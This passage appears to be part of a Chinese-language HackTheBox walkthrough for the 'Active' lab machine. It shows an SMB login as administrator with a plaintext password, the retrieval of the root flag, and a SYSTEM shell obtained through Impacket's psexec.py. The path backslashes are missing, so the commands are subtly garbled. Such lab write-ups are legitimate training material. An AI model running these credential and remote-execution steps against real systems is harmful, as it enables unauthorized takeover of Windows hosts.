|
我可以使用smbclient或者smbmap来进行连接并获取root.txt文件:
- root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/C$ -U active.htbadministrator%Ticketmaster1968
- Try "help" to get a list of possible commands.
- smb: > get usersadministratordesktoproot.txt
- getting file usersadministratordesktoproot.txt of size 34 as usersadministratordesktoproot.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
-
- root@kali:~/hackthebox/active-10.10.10.100# cat root.txt
- b5fc76d1...
这里值得注意的是,我甚至没有获取系统的shell就拿到了系统中的root flag。
System shell
但我当然想getshell。现在这些shares是可写的,而且我有管理员权限,我可以使用PSExec来getshell。直接在kali上就有很多方法进行提权,这里我还是使用Impacket这个工具,使用psexec.py这个脚本:
- root@kali:~/hackthebox/active-10.10.10.100# psexec.py active.htb/administrator@10.10.10.100
- Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
-
- Password:
- [*] Requesting shares on 10.10.10.100.....
- [*] Found writable share ADMIN$
- [*] Uploading file dMCaaHzA.exe
- [*] Opening SVCManager on 10.10.10.100.....
- [*] Creating service aYMa on 10.10.10.100.....
- [*] Starting service aYMa.....
- [!] Press help for extra shell commands
- Microsoft Windows [Version 6.1.7601]
- Copyright (c) 2009 Microsoft Corporation. All rights reserved.
-
- C:Windowssystem32>whoami
- nt authoritysystem
(编辑:晋中站长网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
